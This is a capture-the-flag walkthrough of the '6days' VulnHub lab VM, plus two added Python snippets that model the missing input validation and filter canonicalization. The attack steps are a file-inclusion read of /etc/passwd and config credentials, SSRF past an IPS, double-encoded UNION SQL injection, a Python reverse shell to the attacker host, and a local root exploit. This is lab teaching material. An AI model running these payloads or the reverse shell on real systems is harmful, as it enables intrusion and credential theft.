6days Walkthrough

You can download the VM from here; the author is canyoupwnme.

attack machine: 192.168.56.105  
target machine: 192.168.56.101  

Use Nmap:

root@evilc:/vulnhub/6days# nmap -sV -T4 192.168.56.101

Starting Nmap 7.01 ( https://nmap.org ) at 2017-07-25 14:12 EDT  
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers  
Nmap scan report for 192.168.56.101  
Host is up (0.00015s latency).  
Not shown: 997 closed ports  
PORT     STATE    SERVICE    VERSION  
22/tcp   open     ssh        OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)  
80/tcp   open     http       Apache httpd 2.2.22 ((Ubuntu))  
8080/tcp filtered http-proxy  
MAC Address: 08:00:27:0B:78:6D (Oracle VirtualBox virtual NIC)  
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .  
Nmap done: 1 IP address (1 host up) scanned in 8.56 seconds  

Check port 80 and find a website.
I try to use NONEEDFORPENTEST as the promo code, but get an "expired" response.
OK, leave this part for a while, because I see an image that wasn't loaded successfully. Check the source code:

<html>  
<head>  
<title>Rashomon IPS - Main Page</title>  
</head>  
<body>  
<h2>Rashomon Intrusion Prevention System</h2>  
<h3>Become immune to every attack!</h3>  
Today we're announcing our brand new product, Rashomon IPS! <br />  
It's capable of blocking any <b>sophisticated cyber attack</b> which <u>can harm your precious customers.</u> (you don't want THAT to happen, do you?) <br />  
<img src="http://192.168.56.101/image.php?src=https%3A%2f%2f4.bp.blogspot.com%2f-u8Jo4CEKQLk%2fV4OpiaoMJ7I%2fAAAAAAAAAiw%2f8kuCpTOpRWUAdp2p4GpegWdnOwxjwHNYQCLcB%2fs1600%2fphoto.jpg" /> <br />  
(This guy is coming after your website!) <br />
<br />  
Don't waste your time and money by hiring <font color="#ff00cc">pentesters</font> and doing real security audits. <br />  
This is the best way to secure your organization and you can completely rely on it, and only it! <br />  
<br />  
IT'S SO SECURE WE EVEN USE IT ON OUR WEBSITE. <br />  
<br />  
So be quick and get a <u>%15 discount</u> on our newest product using the promocode <b>NONEEDFORPENTEST</b>. (discount will be available until yesterday)<br />  
<br />  
<form name="promo" method="GET" action="checkpromo.php">  
Apply your promo code here: <input type="text" name="promocode">  
<input type="submit" value="Apply Promo">  
</form>  
</body>  
</html>  

OK, it requests a resource from an external network, but I have limited the VM's network access. Still, I do find something interesting:
this URL uses a ?src parameter to fetch the resource, so I wonder whether there is an LFI or RFI. Check it and bingo:
LFI

root@evilc:/vulnhub/6days# curl -v http://192.168.56.101/image.php?src=../../../../etc/passwd  
*   Trying 192.168.56.101...
* Connected to 192.168.56.101 (192.168.56.101) port 80 (#0)
> GET /image.php?src=../../../../etc/passwd HTTP/1.1
> Host: 192.168.56.101
> User-Agent: curl/7.46.0
> Accept: */*
> 
< HTTP/1.1 200 OK  
< Date: Wed, 26 Jul 2017 15:47:35 GMT  
< Server: Apache/2.2.22 (Ubuntu)  
< X-Powered-By: PHP/5.3.10-1ubuntu3.23  
< Content-Length: 1142  
< Content-Type: image/jpeg  
<  
root:x:0:0:root:/root:/bin/bash  
daemon:x:1:1:daemon:/usr/sbin:/bin/sh  
bin:x:2:2:bin:/bin:/bin/sh  
sys:x:3:3:sys:/dev:/bin/sh  
sync:x:4:65534:sync:/bin:/bin/sync  
games:x:5:60:games:/usr/games:/bin/sh  
man:x:6:12:man:/var/cache/man:/bin/sh  
lp:x:7:7:lp:/var/spool/lpd:/bin/sh  
mail:x:8:8:mail:/var/mail:/bin/sh  
news:x:9:9:news:/var/spool/news:/bin/sh  
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh  
proxy:x:13:13:proxy:/bin:/bin/sh  
www-data:x:33:33:www-data:/var/www:/bin/sh  
backup:x:34:34:backup:/var/backups:/bin/sh  
list:x:38:38:Mailing List Manager:/var/list:/bin/sh  
irc:x:39:39:ircd:/var/run/ircd:/bin/sh  
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh  
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh  
libuuid:x:100:101::/var/lib/libuuid:/bin/sh  
syslog:x:101:103::/home/syslog:/bin/false  
mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false  
messagebus:x:103:106::/var/run/dbus:/bin/false  
whoopsie:x:104:107::/nonexistent:/bin/false  
landscape:x:105:110::/var/lib/landscape:/bin/false  
sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin  
user:x:1000:1000:user,,,:/home/user:/bin/bash  
andrea:x:1001:1001::/home/andrea:/bin/andrea  
* Connection #0 to host 192.168.56.101 left intact

Notice there are two regular users: user and andrea.
RFI

root@evilc:/var/www/html# touch fool.txt  
root@evilc:/var/www/html# echo "hello world" > fool.txt  
root@evilc:/var/www/html# service apache  
apache2              apache-htcacheclean  
root@evilc:/var/www/html# service apache  
apache2              apache-htcacheclean  
root@evilc:/var/www/html# service apache2 start  
root@evilc:/var/www/html# curl -v http://192.168.56.101/image.php?src=http://192.168.56.105/fool.txt  
*   Trying 192.168.56.101...
* Connected to 192.168.56.101 (192.168.56.101) port 80 (#0)
> GET /image.php?src=http://192.168.56.105/fool.txt HTTP/1.1
> Host: 192.168.56.101
> User-Agent: curl/7.46.0
> Accept: */*
> 
< HTTP/1.1 200 OK  
< Date: Wed, 26 Jul 2017 15:50:28 GMT  
< Server: Apache/2.2.22 (Ubuntu)  
< X-Powered-By: PHP/5.3.10-1ubuntu3.23  
< Content-Length: 12  
< Content-Type: image/jpeg  
<  
hello world  
* Connection #0 to host 192.168.56.101 left intact
root@evilc:/var/www/html#  

It seems I can read files through this URL, so I check the other PHP files:

root@evilc:/var/www/html# curl -v http://192.168.56.101/image.php?src=checkpromo.php  
*   Trying 192.168.56.101...
* Connected to 192.168.56.101 (192.168.56.101) port 80 (#0)
> GET /image.php?src=checkpromo.php HTTP/1.1
> Host: 192.168.56.101
> User-Agent: curl/7.46.0
> Accept: */*
> 
< HTTP/1.1 200 OK  
< Date: Wed, 26 Jul 2017 15:51:30 GMT  
< Server: Apache/2.2.22 (Ubuntu)  
< X-Powered-By: PHP/5.3.10-1ubuntu3.23  
< Content-Length: 565  
< Content-Type: image/jpeg  
<  
<?php  
include 'config.php';

$conn = mysql_connect($servername, $username, $password);

if (!$conn) {  
    die("Connection failed: " . $conn->connect_error);
}

$sql = "SELECT discount, status FROM promocodes WHERE promocode='".$_GET['promocode']."';";

mysql_select_db($dbname);  
$result = mysql_query($sql, $conn);

if (!$result) {  
    echo "Promocode not valid!";
} else {
    while($row = mysql_fetch_array($result, MYSQL_ASSOC))
    {
        if($row['status'] == 0)
            echo "Code expired!";
        else
            echo "You have %".$row['discount']." discount!";
    }
}

mysql_close($conn);  
?>
* Connection #0 to host 192.168.56.101 left intact

Notice that in the HTTP response the Content-Type is image/jpeg even though the body is PHP source; that's why I think I can execute my PHP reverse shell through the RFI. So I read image.php itself:

root@evilc:/var/www/html# curl -v http://192.168.56.101/image.php?src=image.php  
*   Trying 192.168.56.101...
* Connected to 192.168.56.101 (192.168.56.101) port 80 (#0)
> GET /image.php?src=image.php HTTP/1.1
> Host: 192.168.56.101
> User-Agent: curl/7.46.0
> Accept: */*
> 
< HTTP/1.1 200 OK  
< Date: Wed, 26 Jul 2017 15:53:09 GMT  
< Server: Apache/2.2.22 (Ubuntu)  
< X-Powered-By: PHP/5.3.10-1ubuntu3.23  
< Content-Length: 82  
< Content-Type: image/jpeg  
<  
<?php  
$img = $_GET['src'];
header('Content-Type: image/jpeg');  
readfile($img);  
?>
* Connection #0 to host 192.168.56.101 left intact
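As an added example (not the VM's code and not the author's), here is a Python model of the check image.php is missing: its readfile($_GET['src']) accepts paths and URLs alike, which is what makes the directory traversal, the fetch from my own web server and the later loopback request to port 8080 all succeed. The images directory, the image-extension allowlist and the file name photo.jpg are assumptions.

```python
"""Python model of the validation image.php lacks (added example, not the VM's code).

On the target, image.php runs readfile() on src with no checks, so
../../../../etc/passwd, checkpromo.php, /etc/apache2/sites-available/default
and http:// URLs are all served back as image/jpeg. resolve_image() accepts
only a plain file name that resolves inside one images directory and carries
an image extension; everything else is refused.
"""
import os
import tempfile
from typing import Dict, Optional
from urllib.parse import urlsplit

ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif"}  # assumed allowlist

# Inputs taken from the walkthrough's requests, plus one legitimate file name
# (photo.jpg, a constructed sample) that the check must still allow.
PAGE_INPUTS = [
    "photo.jpg",
    "../../../../etc/passwd",                                # traversal
    "checkpromo.php",                                        # source disclosure
    "/etc/apache2/sites-available/default",                  # absolute path
    "http://192.168.56.105/fool.txt",                        # remote fetch
    "http://127.0.0.1:8080/checkpromo.php?promocode=1%2527",  # loopback hop
]


def resolve_image(src: str, image_dir: str) -> Optional[str]:
    """Return the real path to serve, or None if src must be refused."""
    # readfile() with any URL scheme becomes an outbound request made by the
    # server itself, so refuse anything that parses with a scheme.
    if urlsplit(src).scheme:
        return None
    base = os.path.realpath(image_dir)
    # os.path.join() discards base for absolute input and realpath() collapses
    # ../ segments, so one containment test covers both cases.
    candidate = os.path.realpath(os.path.join(base, src))
    if not candidate.startswith(base + os.sep):
        return None
    # Only image extensions: .php sources inside the web root are refused too.
    if os.path.splitext(candidate)[1].lower() not in ALLOWED_EXT:
        return None
    if not os.path.isfile(candidate):
        return None
    return candidate


def demo() -> Dict[str, Optional[str]]:
    """Run the page's inputs against a throwaway images directory."""
    image_dir = tempfile.mkdtemp(prefix="images_")
    with open(os.path.join(image_dir, "photo.jpg"), "wb") as fh:
        fh.write(b"\xff\xd8\xff\xe0")  # constructed JPEG header bytes
    return {src: resolve_image(src, image_dir) for src in PAGE_INPUTS}


if __name__ == "__main__":
    for src, result in demo().items():
        print(f"{src!r:58} -> {'serve ' + result if result else 'refused'}")
```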

image.php just hands src to readfile(), so the RFI only returns file contents and does not execute them. But I do find something useful in config.php:

root@evilc:/var/www/html# curl -v http://192.168.56.101/image.php?src=config.php  
*   Trying 192.168.56.101...
* Connected to 192.168.56.101 (192.168.56.101) port 80 (#0)
> GET /image.php?src=config.php HTTP/1.1
> Host: 192.168.56.101
> User-Agent: curl/7.46.0
> Accept: */*
> 
< HTTP/1.1 200 OK  
< Date: Wed, 26 Jul 2017 15:52:42 GMT  
< Server: Apache/2.2.22 (Ubuntu)  
< X-Powered-By: PHP/5.3.10-1ubuntu3.23  
< Content-Length: 114  
< Content-Type: image/jpeg  
<  
<?php  
$servername = "localhost";
$username = "sellingstuff";
$password = "n0_\$\$_n0_g41ns";
$dbname = "fancydb";
* Connection #0 to host 192.168.56.101 left intact

The database name is fancydb, and I now know the username and password. The database port is not exposed, though, so I may try some SQL injection instead.

I return to the promo code check. Since checkpromo.php concatenates the promocode parameter straight into the query, there must be a SQLi vulnerability, but it seems the WAF detects it:

root@evilc:/var/www/html# curl -v "http://192.168.56.101/checkpromo?promocode=NONEEDFORPENTEST'"  
*   Trying 192.168.56.101...
* Connected to 192.168.56.101 (192.168.56.101) port 80 (#0)
> GET /checkpromo?promocode=NONEEDFORPENTEST' HTTP/1.1
> Host: 192.168.56.101
> User-Agent: curl/7.46.0
> Accept: */*
> 
< HTTP/1.1 200 OK  
< Date: Sat, 02 Jul 2016 07:26:13 GMT  
< Server: Apache/2.2.22 (Ubuntu)  
< X-Powered-By: RashomonIDS/v0.1  
< Content-Length: 40  
< Keep-Alive: timeout=5, max=100  
< Connection: Keep-Alive  
< Content-Type: text/html  
<  
Malicious request blocked!  
* Connection #0 to host 192.168.56.101 left intact
~Rashomon IPS

I try some methods to bypass it, but nothing works. Then I recheck the Nmap result and notice port 8080, reported as http-proxy.
Well, check the Apache configuration:

root@evilc:/var/www/html# curl -v http://192.168.56.101/image.php?src=/etc/apache2/sites-available/default  
*   Trying 192.168.56.101...
* Connected to 192.168.56.101 (192.168.56.101) port 80 (#0)
> GET /image.php?src=/etc/apache2/sites-available/default HTTP/1.1
> Host: 192.168.56.101
> User-Agent: curl/7.46.0
> Accept: */*
> 
< HTTP/1.1 200 OK  
< Date: Wed, 26 Jul 2017 16:00:15 GMT  
< Server: Apache/2.2.22 (Ubuntu)  
< X-Powered-By: PHP/5.3.10-1ubuntu3.23  
< Content-Length: 952  
< Content-Type: image/jpeg  
<  
<VirtualHost *:8080>  
    ServerAdmin webmaster@localhost

    DocumentRoot /var/www
    <Directory />
        Options FollowSymLinks
        AllowOverride None
    </Directory>
    <Directory /var/www/>
        Options Indexes FollowSymLinks MultiViews
        AllowOverride None
        Order allow,deny
        allow from all
    </Directory>

    ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
    <Directory "/usr/lib/cgi-bin">
        AllowOverride None
        Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
        Order allow,deny
        Allow from all
    </Directory>

    ErrorLog ${APACHE_LOG_DIR}/error.log

    # Possible values include: debug, info, notice, warn, error, crit,
    # alert, emerg.
    LogLevel warn

    CustomLog ${APACHE_LOG_DIR}/access.log combined

    Alias /doc/ "/usr/share/doc/"
    <Directory "/usr/share/doc/">
        Options Indexes MultiViews FollowSymLinks
        AllowOverride None
        Order deny,allow
        Deny from all
        Allow from 127.0.0.0/255.0.0.0 ::1/128
    </Directory>

</VirtualHost>  
* Connection #0 to host 192.168.56.101 left intact

There is a virtual host on port 8080.
emmmmmmm.......
Since image.php fetches whatever URL it is given, try reaching that virtual host through the server's own loopback interface:

root@evilc:/var/www/html# curl -v http://192.168.56.101/image.php?src=http://127.0.0.1:8080/index.php  
*   Trying 192.168.56.101...
* Connected to 192.168.56.101 (192.168.56.101) port 80 (#0)
> GET /image.php?src=http://127.0.0.1:8080/index.php HTTP/1.1
> Host: 192.168.56.101
> User-Agent: curl/7.46.0
> Accept: */*
> 
< HTTP/1.1 200 OK  
< Date: Wed, 26 Jul 2017 16:02:18 GMT  
< Server: Apache/2.2.22 (Ubuntu)  
< X-Powered-By: PHP/5.3.10-1ubuntu3.23  
< Content-Length: 1274  
< Content-Type: image/jpeg  
<  
<html>  
<head>  
<title>Rashomon IPS - Main Page</title>  
</head>  
<body>  
<h2>Rashomon Intrusion Prevention System</h2>  
<h3>Become immune to every attack!</h3>  
Today we're announcing our brand new product, Rashomon IPS! <br />  
It's capable of blocking any <b>sophisticated cyber attack</b> which <u>can harm your precious customers.</u> (you don't want THAT to happen, do you?) <br />  
<img src="http://192.168.56.101/image.php?src=https%3A%2f%2f4.bp.blogspot.com%2f-u8Jo4CEKQLk%2fV4OpiaoMJ7I%2fAAAAAAAAAiw%2f8kuCpTOpRWUAdp2p4GpegWdnOwxjwHNYQCLcB%2fs1600%2fphoto.jpg" /> <br />  
(This guy is coming after your website!) <br />
<br />  
Don't waste your time and money by hiring <font color="#ff00cc">pentesters</font> and doing real security audits. <br />  
This is the best way to secure your organization and you can completely rely on it, and only it! <br />  
<br />  
IT'S SO SECURE WE EVEN USE IT ON OUR WEBSITE. <br />  
<br />  
So be quick and get a <u>%15 discount</u> on our newest product using the promocode <b>NONEEDFORPENTEST</b>. (discount will be available until yesterday)<br />  
<br />  
<form name="promo" method="GET" action="checkpromo.php">  
Apply your promo code here: <input type="text" name="promocode">  
<input type="submit" value="Apply Promo">  
</form>  
</body>  
</html>  
* Connection #0 to host 192.168.56.101 left intact

Nice, I can access the page through this virtual host.
Then I try the SQL injection again:

root@evilc:/var/www/html# curl -v "http://192.168.56.101/image.php?src=http://127.0.0.1:8080/checkpromo.php?promocode=1'"  
*   Trying 192.168.56.101...
* Connected to 192.168.56.101 (192.168.56.101) port 80 (#0)
> GET /image.php?src=http://127.0.0.1:8080/checkpromo.php?promocode=1' HTTP/1.1
> Host: 192.168.56.101
> User-Agent: curl/7.46.0
> Accept: */*
> 
< HTTP/1.1 200 OK  
< Date: Sat, 02 Jul 2016 07:26:13 GMT  
< Server: Apache/2.2.22 (Ubuntu)  
< X-Powered-By: RashomonIDS/v0.1  
< Content-Length: 40  
< Keep-Alive: timeout=5, max=100  
< Connection: Keep-Alive  
< Content-Type: text/html  
<  
Malicious request blocked!  
* Connection #0 to host 192.168.56.101 left intact
~Rashomon IPS

Double URL encoding works here. The IPS inspects the outer request and sees %2527; PHP on port 80 decodes the query string once, so image.php forwards promocode=1%27 to port 8080, where it is decoded again and checkpromo.php receives a bare quote:

root@evilc:/var/www/html# curl -v "http://192.168.56.101/image.php?src=http://127.0.0.1:8080/checkpromo.php?promocode=1%2527"  
*   Trying 192.168.56.101...
* Connected to 192.168.56.101 (192.168.56.101) port 80 (#0)
> GET /image.php?src=http://127.0.0.1:8080/checkpromo.php?promocode=1%2527 HTTP/1.1
> Host: 192.168.56.101
> User-Agent: curl/7.46.0
> Accept: */*
> 
< HTTP/1.1 200 OK  
< Date: Wed, 26 Jul 2017 16:04:19 GMT  
< Server: Apache/2.2.22 (Ubuntu)  
< X-Powered-By: PHP/5.3.10-1ubuntu3.23  
< Content-Length: 20  
< Content-Type: image/jpeg  
<  
* Connection #0 to host 192.168.56.101 left intact
Promocode not valid!  
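As an added illustration of why this works (not part of the walkthrough and not the Rashomon IPS's code), the Python below models a filter that decodes once against one that canonicalizes until the value is stable, and shows what checkpromo.php on port 8080 receives after the two decoding hops. The delimiter list the filter keys on is an assumption; the promocode values are the ones from the requests on this page.

```python
"""Added example: single-decode filtering vs. canonicalized filtering.

Models (not the real Rashomon IPS, whose rules are unknown) why 1' is
blocked but 1%2527 reaches checkpromo.php: port 80 decodes the query once
into $_GET['src'], image.php forwards that URL to port 8080, and the query
is decoded a second time there.
"""
from urllib.parse import unquote_plus

# Assumption: the IPS keys on SQL string and comment delimiters like these.
SUSPICIOUS = ("'", '"', "--", "#")

# Values of promocode= exactly as they appear in the walkthrough's requests.
PAGE_VALUES = {
    "valid code": "NONEEDFORPENTEST",
    "blocked quote": "1'",
    "double encoded quote": "1%2527",
    "double encoded union":
        "%2527union%2ball%2bselect%2busername%2c2%2bfrom%2bfancydb.users%2523",
}


def naive_blocked(value: str) -> bool:
    """Filter that decodes once and then looks for the delimiters."""
    decoded = unquote_plus(value)
    return any(tok in decoded for tok in SUSPICIOUS)


def canonicalize(value: str, max_rounds: int = 5) -> str:
    """Percent-decode until the value stops changing, with a bound so that
    hostile input cannot keep the decoder looping."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def canonical_blocked(value: str) -> bool:
    """Same rule as naive_blocked(), applied to the canonical form."""
    return any(tok in canonicalize(value) for tok in SUSPICIOUS)


def backend_sees(value: str) -> str:
    """What checkpromo.php on :8080 receives: two hops, two decodes."""
    return unquote_plus(unquote_plus(value))


def compare() -> dict:
    """(naive verdict, canonical verdict, backend view) for every page value."""
    return {name: (naive_blocked(v), canonical_blocked(v), backend_sees(v))
            for name, v in PAGE_VALUES.items()}


if __name__ == "__main__":
    for name, (naive, canon, seen) in compare().items():
        print(f"{name:22} naive={naive!s:5} canonical={canon!s:5} backend={seen!r}")
```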

Then I construct this payload, a double-encoded UNION SELECT against fancydb.users:

root@evilc:/# curl -v "http://192.168.56.101/image.php?src=http://127.0.0.1:8080/checkpromo.php?promocode=%2527union%2ball%2bselect%2busername%2c2%2bfrom%2bfancydb.users%2523"  
*   Trying 192.168.56.101...
* Connected to 192.168.56.101 (192.168.56.101) port 80 (#0)
> GET /image.php?src=http://127.0.0.1:8080/checkpromo.php?promocode=%2527union%2ball%2bselect%2busername%2c2%2bfrom%2bfancydb.users%2523 HTTP/1.1
> Host: 192.168.56.101
> User-Agent: curl/7.46.0
> Accept: */*
> 
< HTTP/1.1 200 OK  
< Date: Tue, 25 Jul 2017 20:27:29 GMT  
< Server: Apache/2.2.22 (Ubuntu)  
< X-Powered-By: PHP/5.3.10-1ubuntu3.23  
< Content-Length: 26  
< Content-Type: image/jpeg  
<  
* Connection #0 to host 192.168.56.101 left intact
You have %andrea discount!root@evilc:/#  
root@evilc:/# curl -v "http://192.168.56.101/image.php?src=http://127.0.0.1:8080/checkpromo.php?promocode=%2527union%2ball%2bselect%2bpassword%2c2%2bfrom%2bfancydb.users%2523"  
*   Trying 192.168.56.101...
* Connected to 192.168.56.101 (192.168.56.101) port 80 (#0)
> GET /image.php?src=http://127.0.0.1:8080/checkpromo.php?promocode=%2527union%2ball%2bselect%2bpassword%2c2%2bfrom%2bfancydb.users%2523 HTTP/1.1
> Host: 192.168.56.101
> User-Agent: curl/7.46.0
> Accept: */*
> 
< HTTP/1.1 200 OK  
< Date: Tue, 25 Jul 2017 20:27:42 GMT  
< Server: Apache/2.2.22 (Ubuntu)  
< X-Powered-By: PHP/5.3.10-1ubuntu3.23  
< Content-Length: 35  
< Content-Type: image/jpeg  
<  
* Connection #0 to host 192.168.56.101 left intact
You have %SayNoToPentests discount!  

Then I get a username and password pair:
andrea:SayNoToPentests

From /etc/passwd we know there is a user on this system called andrea, so try SSH:

root@evilc:/vulnhub/6days# ssh andrea@192.168.56.101  
andrea@192.168.56.101's password:  
Welcome to Ubuntu 12.04.5 LTS (GNU/Linux 3.13.0-32-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Wed Jul 26 19:06:20 EEST 2017

  System load:  0.0               Processes:           79
  Usage of /:   18.5% of 6.76GB   Users logged in:     0
  Memory usage: 9%                IP address for eth0: 192.168.56.101
  Swap usage:   0%

  Graph this data and manage this system at:
    https://landscape.canonical.com/

New release '14.04.4 LTS' available.  
Run 'do-release-upgrade' to upgrade to it.


Your Hardware Enablement Stack (HWE) is supported until April 2017.

Last login: Tue Jul 25 23:32:12 2017 from 192.168.56.105  
andrea@cypm:~$  

But the shell is rbash, so we are stuck in a restricted jail. However, python is available:

andrea@cypm:~$ id  
andrea@cypm:~$ ls  
andrea@cypm:~$ cd ..  
rbash: cd: restricted  
andrea@cypm:~$ whereis python  
andrea@cypm:~$ ls -la  
andrea@cypm:~$ whoami  
andrea@cypm:~$ uname -a  
andrea@cypm:~$ cat

^Candrea@cypm:~$ wtf
rbash: /usr/bin/python: restricted: cannot specify `/' in command names  
andrea@cypm:~$ wtf  
rbash: /usr/bin/python: restricted: cannot specify `/' in command names  
andrea@cypm:~$ python  
Python 2.7.3 (default, Jun 22 2015, 19:43:34)  
[GCC 4.6.3] on linux2
Type "help", "copyright", "credits" or "license" for more information.  
>>> quit()
andrea@cypm:~$  

Then we use python to escape it, with a reverse shell back to the attack machine on port 1234:

andrea@cypm:~$ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.105",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'  

In another terminal, on the listener:

andrea@cypm:~$ ls -la  
ls -la  
total 28  
drwxr-xr-x 3 andrea andrea 4096 Jul 26 19:11 .  
drwxr-xr-x 4 root   root   4096 Jul  2  2016 ..  
lrwxrwxrwx 1 root   root      9 Jul  2  2016 .bash_history -> /dev/null  
drwx------ 2 andrea andrea 4096 Jul 25 23:29 .cache  
-rwsrwxr-x 1 root   andrea 7452 Jul 11  2016 dog
-rwxr-xr-x 1 andrea andrea 7158 Jul 25 23:46 flag

In the hint, the author told us to run the /flag file. I check the uname of this machine and find an exploit for this kernel.
But I found another way to get the final flag:
final
I know it's not the right way; I will figure out how to use the setuid binary dog to execute the flag file in the future.


Update:

Use this exploit to get the root shell:

andrea@cypm:~$ ls  
ls  
dog  
ofs.c  
andrea@cypm:~$ gcc pf^H  
gcc p  
gcc: error: p: No such file or directory  
gcc: fatal error: no input files  
compilation terminated.  
andrea@cypm:~$ gcc ofs.c -o ofs  
gcc ofs.c -o ofs  
andrea@cypm:~$ ./ofc  
./ofc
bash: ./ofc: No such file or directory  
andrea@cypm:~$ ./ofs  
./ofs
spawning threads  
mount #1  
mount #2  
child threads done  
/etc/ld.so.preload created
creating shared library  
# id
uid=0(root) gid=0(root) groups=0(root),1001(andrea)

Done, amazing.